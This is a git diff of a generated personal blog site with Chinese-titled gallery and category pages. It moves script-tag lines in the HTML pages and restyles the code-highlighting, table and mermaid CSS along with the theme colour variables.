var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/categories/\350\256\260\345\275\225/page/8/index.html" "b/categories/\350\256\260\345\275\225/page/8/index.html" index cfa0e6b079..96cd11e901 100644 --- "a/categories/\350\256\260\345\275\225/page/8/index.html" +++ "b/categories/\350\256\260\345\275\225/page/8/index.html" @@ -43,8 +43,6 @@ - - @@ -1351,6 +1349,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/categories/\350\256\260\345\275\225/page/9/index.html" "b/categories/\350\256\260\345\275\225/page/9/index.html" index cfa0e6b079..96cd11e901 100644 --- "a/categories/\350\256\260\345\275\225/page/9/index.html" +++ "b/categories/\350\256\260\345\275\225/page/9/index.html" @@ -43,8 +43,6 @@ - - @@ -1351,6 +1349,8 @@

目录

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/css/index.css b/css/index.css index 583342c629..9618db921a 100644 --- a/css/index.css +++ b/css/index.css @@ -18,6 +18,61 @@ .hbe-container { margin: 0 !important; } +.highlight.closed tbody { + display: none; +} +.highlight { + margin: 5px 0; + border: 2px solid var(--border); + tab-size: 4; +} +.highlight table { + display: block; + border: none; + margin: 0; + background-color: var(--tabs-bg); + overflow: auto; +} +.highlight table td:hover, +.highlight table tr:hover { + background: none; +} +.highlight table td { + border: 0; + padding: 0; +} +.highlight table td pre { + text-align: right; + line-height: 1.5em; +} +.highlight table td pre span { + font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace; +} +.highlight table td pre span, +.highlight table td pre code { + font-size: 15px; + width: 100%; + overflow-x: auto; + flex: 1; + text-align: left; + word-spacing: normal; + word-break: normal; + word-wrap: normal; + border-radius: 0; + line-height: 1.5em; + transition: background 0.5s ease-in-out, color 0.5s ease-in-out; +} +.highlight table .gutter { + border-right: 1px solid var(--border); + padding: 10px; +} +.highlight table .gutter .line { + color: var(--th-text); +} +.highlight table .code { + padding: 10px; + overflow: auto; +} .highlight-tools { background: var(--highlight-tools-bg); position: relative; @@ -25,13 +80,14 @@ transition: background 0.5s ease-in-out; } .highlight-tools .copy-notice { + line-height: 32px; font-weight: 500; position: absolute; - right: 30px; + right: 32px; font-size: 14px; opacity: 0; transition: opacity 0.5s; - color: var(--highlight-tools-text); + color: var(--th-text); -webkit-user-select: none; /* Safari */ -moz-user-select: none; @@ -56,11 +112,13 @@ filter: brightness(120%); } .highlight-tools .code-lang { + margin-left: 10px; + line-height: 32px; font-weight: bold; position: absolute; left: 30px; font-size: 18px; - color: var(--highlight-tools-text); + color: var(--th-text); font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace; } .highlight-tools .close-code-block-button { @@ -77,9 +135,6 @@ .highlight-tools .close-code-block-button:hover { cursor: pointer; } -pre .closed { - display: none; -} .local-search { display: grid; } @@ -821,23 +876,6 @@ article img { margin: 5px auto; display: flex; } -article pre { - font-size: 0.9em; - line-height: 1.5em; - display: flex; - max-width: 100%; - position: relative; -} -article pre code { - overflow-x: auto; - flex: 1; - text-align: left; - padding: 10px 15px; - word-spacing: normal; - word-break: normal; - word-wrap: normal; - border-radius: 0; -} article details summary { cursor: pointer; line-height: 30px; @@ -923,7 +961,7 @@ article p code, article td code:not(pre code), article ul code:not(pre code), article li code:not(pre code) { - font-size: 0.9em; + font-size: 15px; margin: 0 4px; padding: 3px 6px; font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace; @@ -939,9 +977,6 @@ article p strong { article .table-container { overflow-x: auto; } -article .highlight table { - width: 100%; -} article table { border-collapse: collapse; line-height: 1.2em; @@ -982,16 +1017,13 @@ article table tr td:first-child { article thead tr { height: 2.5em; } -article thead tr:nth-child(odd) { - background: hsla(0, 0%, 96.5%, 0.51); -} article thead th { - color: var(--text-primary); - background: var(--tabs-bg); text-align: left; transition: all 0.5s ease-in-out; padding: 0 1em; line-height: 30px; + color: var(--text-primary); + background: var(--tabs-bg); } article tbody tr { line-height: 30px; @@ -1007,9 +1039,6 @@ article tbody td { line-height: 30px; transition: border 0.5s ease-in-out, color 0.5s ease-in-out; } -article tbody td.code { - padding: 0; -} article [id^="reffn_"]::before { content: "["; } @@ -1572,7 +1601,6 @@ pre code { } [data-theme='light'] .hljs { color: #24292e; - background: #f6f8fa; } [data-theme='light'] .hljs-doctag, [data-theme='light'] .hljs-keyword, @@ -1679,7 +1707,6 @@ Original One Dark Syntax theme from https://github.com/atom/one-dark-syntax */ [data-theme='dark'] pre code { color: #ccc; - background: #1f1f1f; } [data-theme='dark'] .hljs-comment, [data-theme='dark'] .hljs-quote { diff --git a/css/plugins/highlight/highlight-dark.css b/css/plugins/highlight/highlight-dark.css index 325d2ec707..80e97cceab 100644 --- a/css/plugins/highlight/highlight-dark.css +++ b/css/plugins/highlight/highlight-dark.css @@ -6,7 +6,6 @@ Original One Dark Syntax theme from https://github.com/atom/one-dark-syntax */ [data-theme='dark'] pre code { color: #ccc; - background: #1f1f1f; } [data-theme='dark'] .hljs-comment, [data-theme='dark'] .hljs-quote { diff --git a/css/plugins/highlight/highlight-light.css b/css/plugins/highlight/highlight-light.css index 7faf89e2d1..318b7cff21 100644 --- a/css/plugins/highlight/highlight-light.css +++ b/css/plugins/highlight/highlight-light.css @@ -42,7 +42,6 @@ pre code { } [data-theme='light'] .hljs { color: #24292e; - background: #f6f8fa; } [data-theme='light'] .hljs-doctag, [data-theme='light'] .hljs-keyword, diff --git a/css/plugins/highlight_tools.css b/css/plugins/highlight_tools.css index 0c3203f490..6694318db5 100644 --- a/css/plugins/highlight_tools.css +++ b/css/plugins/highlight_tools.css @@ -1,3 +1,58 @@ +.highlight.closed tbody { + display: none; +} +.highlight { + margin: 5px 0; + border: 2px solid var(--border); + tab-size: 4; +} +.highlight table { + display: block; + border: none; + margin: 0; + background-color: var(--tabs-bg); + overflow: auto; +} +.highlight table td:hover, +.highlight table tr:hover { + background: none; +} +.highlight table td { + border: 0; + padding: 0; +} +.highlight table td pre { + text-align: right; + line-height: 1.5em; +} +.highlight table td pre span { + font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace; +} +.highlight table td pre span, +.highlight table td pre code { + font-size: 15px; + width: 100%; + overflow-x: auto; + flex: 1; + text-align: left; + word-spacing: normal; + word-break: normal; + word-wrap: normal; + border-radius: 0; + line-height: 1.5em; + transition: background 0.5s ease-in-out, color 0.5s ease-in-out; +} +.highlight table .gutter { + border-right: 1px solid var(--border); + padding: 10px; +} +.highlight table .gutter .line { + color: var(--th-text); +} +.highlight table .code { + padding: 10px; + overflow: auto; +} .highlight-tools { background: var(--highlight-tools-bg); position: relative; @@ -5,13 +60,14 @@ transition: background 0.5s ease-in-out; } .highlight-tools .copy-notice { + line-height: 32px; font-weight: 500; position: absolute; - right: 30px; + right: 32px; font-size: 14px; opacity: 0; transition: opacity 0.5s; - color: var(--highlight-tools-text); + color: var(--th-text); -webkit-user-select: none; /* Safari */ -moz-user-select: none; @@ -36,11 +92,13 @@ filter: brightness(120%); } .highlight-tools .code-lang { + margin-left: 10px; + line-height: 32px; font-weight: bold; position: absolute; left: 30px; font-size: 18px; - color: var(--highlight-tools-text); + color: var(--th-text); font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace; } .highlight-tools .close-code-block-button { @@ -57,6 +115,3 @@ .highlight-tools .close-code-block-button:hover { cursor: pointer; } -pre .closed { - display: none; -} diff --git a/css/plugins/mermaid.css b/css/plugins/mermaid.css index e8986d01bc..70d476454e 100644 --- a/css/plugins/mermaid.css +++ b/css/plugins/mermaid.css @@ -1,4 +1,41 @@ .mermaid { display: flex; justify-content: center; +} + +.mermaid-container:hover>.mermaid-tools>.copy-button { + display: block; +} + +.mermaid-tools>.copy-button { + display: none; + position: absolute; + width: 18px; + height: 18px; + right: 85px; + border: none; + background-color: rgba(0, 0, 0, 0); + background-size: cover; +} + +.mermaid-tools>.copy-button:hover { + cursor: pointer; + filter: brightness(120%); +} + +.mermaid-tools>.copy-notice { + font-weight: 500; + position: absolute; + right: 110px; + font-size: 14px; + opacity: 0; + transition: opacity 0.5s; + color: var(--th-text); + -webkit-user-select: none; + /* Safari */ + -moz-user-select: none; + /* Firefox */ + -ms-user-select: none; + /* IE 10+ */ + user-select: none; } \ No newline at end of file diff --git a/css/public/var.css b/css/public/var.css index 9a81c34f14..3c5e0fed7e 100644 --- a/css/public/var.css +++ b/css/public/var.css @@ -8,10 +8,10 @@ --background-tertiary: #eff2f6; --blockquote-bg: #fafafa; --border: #ececec; - --code-bg: #f1f5fb; --highlight-tools-bg: #e6ebf1; - --highlight-tools-text: #b3b3b3; - --tabs-bg: #f8f8f8; + --th-text: #90a4ae; + --tabs-bg: #f6f8fa; + --code-bg: #f1f5fb; --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(255, 255, 255, 0.9), rgba(255, 255, 255, 0.9), rgba(0, 0, 0, 0)); } @@ -25,9 +25,9 @@ --background-tertiary: rgba(0, 0, 0, 0.95); --blockquote-bg: transparent; --border: #2c2c2c; - --code-bg: #2c2c2c; --highlight-tools-bg: #1a1a1a; - --highlight-tools-text: #cdcdcd; - --tabs-bg: #2c2c2c; + --th-text: #cdcdcd; + --tabs-bg: #1f1f1f; + --code-bg: #2c2c2c; --gallery-content-description-bg: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0.9), rgba(0, 0, 0, 0)); } \ No newline at end of file diff --git a/css/widgets/main.css b/css/widgets/main.css index 28f37d7dba..3d60796816 100644 --- a/css/widgets/main.css +++ b/css/widgets/main.css @@ -130,23 +130,6 @@ article img { margin: 5px auto; display: flex; } -article pre { - font-size: 0.9em; - line-height: 1.5em; - display: flex; - max-width: 100%; - position: relative; -} -article pre code { - overflow-x: auto; - flex: 1; - text-align: left; - padding: 10px 15px; - word-spacing: normal; - word-break: normal; - word-wrap: normal; - border-radius: 0; -} article details summary { cursor: pointer; line-height: 30px; @@ -232,7 +215,7 @@ article p code, article td code:not(pre code), article ul code:not(pre code), article li code:not(pre code) { - font-size: 0.9em; + font-size: 15px; margin: 0 4px; padding: 3px 6px; font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace; @@ -248,9 +231,6 @@ article p strong { article .table-container { overflow-x: auto; } -article .highlight table { - width: 100%; -} article table { border-collapse: collapse; line-height: 1.2em; @@ -291,16 +271,13 @@ article table tr td:first-child { article thead tr { height: 2.5em; } -article thead tr:nth-child(odd) { - background: hsla(0, 0%, 96.5%, 0.51); -} article thead th { - color: var(--text-primary); - background: var(--tabs-bg); text-align: left; transition: all 0.5s ease-in-out; padding: 0 1em; line-height: 30px; + color: var(--text-primary); + background: var(--tabs-bg); } article tbody tr { line-height: 30px; @@ -316,9 +293,6 @@ article tbody td { line-height: 30px; transition: border 0.5s ease-in-out, color 0.5s ease-in-out; } -article tbody td.code { - padding: 0; -} article [id^="reffn_"]::before { content: "["; } diff --git a/galleries/index.html b/galleries/index.html index 18ae013424..653bff5f9f 100644 --- a/galleries/index.html +++ b/galleries/index.html @@ -43,8 +43,6 @@ - - @@ -461,6 +459,8 @@

小时候

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/index.html" index 6aa7f37edb..e530578591 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/index.html" @@ -43,8 +43,6 @@ - - @@ -521,6 +519,8 @@

更小的时候

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\344\270\212\346\265\267/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\344\270\212\346\265\267/index.html" index cf46d52fa0..efa405ee60 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\344\270\212\346\265\267/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\344\270\212\346\265\267/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\344\271\214\345\261\261\345\260\217\345\255\246/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\344\271\214\345\261\261\345\260\217\345\255\246/index.html" index 12ed8e1b14..1014306e67 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\344\271\214\345\261\261\345\260\217\345\255\246/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\344\271\214\345\261\261\345\260\217\345\255\246/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\344\272\221\345\215\227/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\344\272\221\345\215\227/index.html" index 0b70ef0fbe..54c0ab369f 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\344\272\221\345\215\227/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\344\272\221\345\215\227/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\345\205\224\344\270\255/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\345\205\224\344\270\255/index.html" index f126066014..ffc3842591 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\345\205\224\344\270\255/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\345\205\224\344\270\255/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\346\227\266\344\273\243\344\270\255\345\255\246/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\346\227\266\344\273\243\344\270\255\345\255\246/index.html" index 1d43ce40f4..1865526035 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\346\227\266\344\273\243\344\270\255\345\255\246/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\346\227\266\344\273\243\344\270\255\345\255\246/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\346\233\264\345\260\217\347\232\204\346\227\266\345\200\231/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\346\233\264\345\260\217\347\232\204\346\227\266\345\200\231/index.html" index 92cd5e2bc5..961969bea7 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\346\233\264\345\260\217\347\232\204\346\227\266\345\200\231/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\346\233\264\345\260\217\347\232\204\346\227\266\345\200\231/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\347\224\230\350\202\203\345\222\214\346\226\260\347\226\206/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\347\224\230\350\202\203\345\222\214\346\226\260\347\226\206/index.html" index c7a6fd1341..13ed9ef2f5 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\347\224\230\350\202\203\345\222\214\346\226\260\347\226\206/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\347\224\230\350\202\203\345\222\214\346\226\260\347\226\206/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\347\224\273/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\347\224\273/index.html" index 698863828c..bb7e636bbd 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\347\224\273/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\347\224\273/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\345\260\217\346\227\266\345\200\231/\347\246\217\345\267\236/index.html" "b/galleries/\345\260\217\346\227\266\345\200\231/\347\246\217\345\267\236/index.html" index 7de5b96be2..b75211e9a1 100644 --- "a/galleries/\345\260\217\346\227\266\345\200\231/\347\246\217\345\267\236/index.html" +++ "b/galleries/\345\260\217\346\227\266\345\200\231/\347\246\217\345\267\236/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

有趣的相册~(施工中)

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/PS \344\275\234\345\223\201/index.html" "b/galleries/\346\234\254\347\247\221/PS \344\275\234\345\223\201/index.html" index 4381f0757a..2c1285a0ae 100644 --- "a/galleries/\346\234\254\347\247\221/PS \344\275\234\345\223\201/index.html" +++ "b/galleries/\346\234\254\347\247\221/PS \344\275\234\345\223\201/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

一阵乱 P

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/index.html" "b/galleries/\346\234\254\347\247\221/index.html" index c36ffb042e..5f827bdbc4 100644 --- "a/galleries/\346\234\254\347\247\221/index.html" +++ "b/galleries/\346\234\254\347\247\221/index.html" @@ -43,8 +43,6 @@ - - @@ -511,6 +509,8 @@

炉石传说

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\345\214\227\344\272\254/index.html" "b/galleries/\346\234\254\347\247\221/\345\214\227\344\272\254/index.html" index f40277072b..472521e29a 100644 --- "a/galleries/\346\234\254\347\247\221/\345\214\227\344\272\254/index.html" +++ "b/galleries/\346\234\254\347\247\221/\345\214\227\344\272\254/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

北京欢迎你~有梦想谁都了不起~

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\345\216\246\351\227\250/index.html" "b/galleries/\346\234\254\347\247\221/\345\216\246\351\227\250/index.html" index 1b60e5313e..1b2077ef42 100644 --- "a/galleries/\346\234\254\347\247\221/\345\216\246\351\227\250/index.html" +++ "b/galleries/\346\234\254\347\247\221/\345\216\246\351\227\250/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

太坑了!宰客门!!!

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\346\240\241\345\233\255\351\243\216\345\205\211/index.html" "b/galleries/\346\234\254\347\247\221/\346\240\241\345\233\255\351\243\216\345\205\211/index.html" index 4f251fb9d6..d1500670ac 100644 --- "a/galleries/\346\234\254\347\247\221/\346\240\241\345\233\255\351\243\216\345\205\211/index.html" +++ "b/galleries/\346\234\254\347\247\221/\346\240\241\345\233\255\351\243\216\345\205\211/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

知明行笃 立诚致广

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\347\202\211\347\237\263\344\274\240\350\257\264/index.html" "b/galleries/\346\234\254\347\247\221/\347\202\211\347\237\263\344\274\240\350\257\264/index.html" index 127736b566..899d8d2694 100644 --- "a/galleries/\346\234\254\347\247\221/\347\202\211\347\237\263\344\274\240\350\257\264/index.html" +++ "b/galleries/\346\234\254\347\247\221/\347\202\211\347\237\263\344\274\240\350\257\264/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

召唤 7 甲!

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\347\246\217\345\267\236/index.html" "b/galleries/\346\234\254\347\247\221/\347\246\217\345\267\236/index.html" index f4ad0ee9f1..ff14bc0fff 100644 --- "a/galleries/\346\234\254\347\247\221/\347\246\217\345\267\236/index.html" +++ "b/galleries/\346\234\254\347\247\221/\347\246\217\345\267\236/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

三坊七巷真好玩!百姓鲜捞真好吃!

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\347\273\230\347\224\273\345\237\272\347\241\200/index.html" "b/galleries/\346\234\254\347\247\221/\347\273\230\347\224\273\345\237\272\347\241\200/index.html" index 227e081e28..797a5a431d 100644 --- "a/galleries/\346\234\254\347\247\221/\347\273\230\347\224\273\345\237\272\347\241\200/index.html" +++ "b/galleries/\346\234\254\347\247\221/\347\273\230\347\224\273\345\237\272\347\241\200/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

鬼画符

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\346\234\254\347\247\221/\350\200\203\347\240\224\351\202\243\344\272\233\344\272\213/index.html" "b/galleries/\346\234\254\347\247\221/\350\200\203\347\240\224\351\202\243\344\272\233\344\272\213/index.html" index b9adf94644..e25cc98ccf 100644 --- "a/galleries/\346\234\254\347\247\221/\350\200\203\347\240\224\351\202\243\344\272\233\344\272\213/index.html" +++ "b/galleries/\346\234\254\347\247\221/\350\200\203\347\240\224\351\202\243\344\272\233\344\272\213/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

师大人称小协和

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/index.html" index 4c2d28960e..c0858a845d 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/index.html" @@ -43,8 +43,6 @@ - - @@ -511,6 +509,8 @@

天津

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\345\214\227\344\272\254/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\345\214\227\344\272\254/index.html" index 59a0bf4638..3631ecb8af 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\345\214\227\344\272\254/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\345\214\227\344\272\254/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

王侯已成背影 有谁在看着云起云落的变迁

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\345\215\227\346\230\214/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\345\215\227\346\230\214/index.html" index a88377ca67..3a6d95c911 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\345\215\227\346\230\214/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\345\215\227\346\230\214/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

落霞与孤鹜齐飞,秋水共长天一色

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\345\216\246\351\227\250/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\345\216\246\351\227\250/index.html" index 61624fda8d..f8b9058882 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\345\216\246\351\227\250/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\345\216\246\351\227\250/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

去往何方 才能捧回我的月光 灯火辉煌 是我易碎的梦

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\345\244\251\346\264\245/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\345\244\251\346\264\245/index.html" index 0db536426a..d5d68c078e 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\345\244\251\346\264\245/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\345\244\251\346\264\245/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

天天乐道,津津有味

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\235\255\345\267\236/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\235\255\345\267\236/index.html" index 082af1e62e..0832321e13 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\235\255\345\267\236/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\235\255\345\267\236/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

最忆是杭州

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\255\246\346\261\211/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\255\246\346\261\211/index.html" index 0dc877a176..3e47037a3c 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\255\246\346\261\211/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\255\246\346\261\211/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

武汉,每天不一样!

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/index.html" index 7d1105345c..09eccb09f5 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/index.html" @@ -43,8 +43,6 @@ - - @@ -491,6 +489,8 @@

正定

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\346\230\245\345\244\217/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\346\230\245\345\244\217/index.html" index c96cd3a02f..58899fa82b 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\346\230\245\345\244\217/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\346\230\245\345\244\217/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

关山难越,萍水相逢。

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\347\247\213\345\206\254/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\347\247\213\345\206\254/index.html" index 1f9f44bdbc..52269428bf 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\347\247\213\345\206\254/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\344\277\235\345\256\232-\347\247\213\345\206\254/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

你们南方人的四季是不完整的。——阿杰

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\345\256\232\345\267\236/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\345\256\232\345\267\236/index.html" index 26b2a4fab8..5412312882 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\345\256\232\345\267\236/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\345\256\232\345\267\236/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

九州咽喉地,神京扼要区

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\346\255\243\345\256\232/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\346\255\243\345\256\232/index.html" index d21996cd7d..656e2dfa77 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\346\255\243\345\256\232/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\346\255\243\345\256\232/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

吾乃石家庄赵子龙是也!

var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\347\237\263\345\256\266\345\272\204/index.html" "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\347\237\263\345\256\266\345\272\204/index.html" index 888dd677b9..a1bd8fa9fc 100644 --- "a/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\347\237\263\345\256\266\345\272\204/index.html" +++ "b/galleries/\347\240\224\347\251\266\347\224\237/\346\262\263\345\214\227/\347\237\263\345\256\266\345\272\204/index.html" @@ -43,8 +43,6 @@ - - @@ -526,6 +524,8 @@

云层深处的黑暗啊 淹没心底的景观

